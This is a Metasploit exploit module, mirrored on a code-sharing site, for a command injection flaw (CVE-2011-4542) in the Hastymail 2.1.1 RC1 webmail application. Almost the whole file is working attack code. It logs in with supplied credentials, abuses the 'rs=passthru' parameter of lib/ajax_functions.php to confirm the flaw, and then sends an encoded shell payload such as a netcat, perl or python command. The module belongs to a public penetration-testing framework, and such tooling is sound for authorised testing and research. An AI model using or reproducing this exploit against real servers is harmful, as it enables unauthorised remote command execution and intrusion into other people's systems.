Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/hastymail_exec.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Hastymail 2.1.1 RC1 Command Injection",

16
        'Description' => %q{

17
          This module exploits a command injection vulnerability found in Hastymail

18
          2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on

19
          the "lib/ajax_functions.php" script. Authentication is required on Hastymail

20
          in order to exploit the vulnerability. The module has been successfully tested

21
          on Hastymail 2.1.1 RC1 over Ubuntu 10.04.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Bruno Teixeira', # Vulnerability Discovery

26
          'juan vazquez' # Metasploit module

27
        ],

28
        'References' => [

29
          [ 'CVE', '2011-4542' ],

30
          [ 'BID', '50791' ],

31
          [ 'OSVDB', '77331' ],

32
          [ 'URL', 'https://www.dognaedis.com/vulns/DGS-SEC-3.html' ]

33
        ],

34
        'Payload' => {

35
          'Compat' =>

36
                  {

37
                    'PayloadType' => 'cmd',

38
                    'RequiredCmd' => 'generic perl ruby python netcat netcat-e',

39
                  }

40
        },

41
        'Platform' => ['unix'],

42
        'Arch' => ARCH_CMD,

43
        'Targets' => [

44
          ['Hastymail 2.1.1 RC1', {}]

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2011-11-22',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('TARGETURI', [true, "The base path to Hastymail", "/hastymail2/"]),

60
        OptString.new('USER', [true, "The username to authenticate with", ""]),

61
        OptString.new('PASS', [true, "The password to authenticate with", ""])

62
      ]

63
    )

64
  end

65


66
  def check

67
    @uri = normalize_uri(target_uri.path)

68
    @uri << '/' if @uri[-1, 1] != '/'

69
    @session_id = ""

70


71
    login

72


73
    if not @session_id or @session_id.empty?

74
      vprint_error "Authentication failed"

75
      return Exploit::CheckCode::Unknown

76
    end

77


78
    test = rand_text_alpha(rand(4) + 4)

79
    data = "rs=passthru&"

80
    data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"

81
    data << "rsargs[]=echo #{test}"

82
    res = send_request_cgi({

83
      'method' => 'POST',

84
      'uri' => "#{@uri}",

85
      'Cookie' => @session_id,

86
      'data' => data

87
    })

88


89
    if res and res.code == 200 and res.body =~ /#{test}/

90
      return Exploit::CheckCode::Vulnerable

91
    else

92
      return Exploit::CheckCode::Safe

93
    end

94
  end

95


96
  def login

97
    res = send_request_cgi({

98
      'method' => 'POST',

99
      'uri' => "#{@uri}?page=login",

100
      'vars_post' =>

101
      {

102
        'user' => datastore['USER'],

103
        'pass' => datastore['PASS'],

104
        'login' => 'Login'

105
      }

106
    })

107


108
    if res and res.code == 303

109
      @session_id = res.get_cookies

110
      print_good("Authentication Successful")

111
    end

112
  end

113


114
  def exploit

115
    @uri = normalize_uri(target_uri.path)

116
    @uri << '/' if @uri[-1, 1] != '/'

117
    @session_id = ""

118


119
    print_status "Trying login"

120
    login

121


122
    if not @session_id or @session_id.empty?

123
      print_error "Authentication failed"

124
      return

125
    end

126


127
    print_good "Authentication successfully, trying to exploit"

128


129
    data = "rs=passthru&"

130
    data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"

131
    data << "rsargs[]=#{payload.encoded}"

132


133
    res = send_request_cgi({

134
      'method' => 'POST',

135
      'uri' => "#{@uri}",

136
      'Cookie' => @session_id,

137
      'headers' => {

138
        'Cmd' => Rex::Text.encode_base64(payload.encoded)

139
      },

140
      'data' => data

141
    })

142


143
    if not res or res.code != 200 or not res.body =~ /\+/

144
      print_error "Exploitation failed"

145
      return

146
    end

147
  end

148


149
end

150


151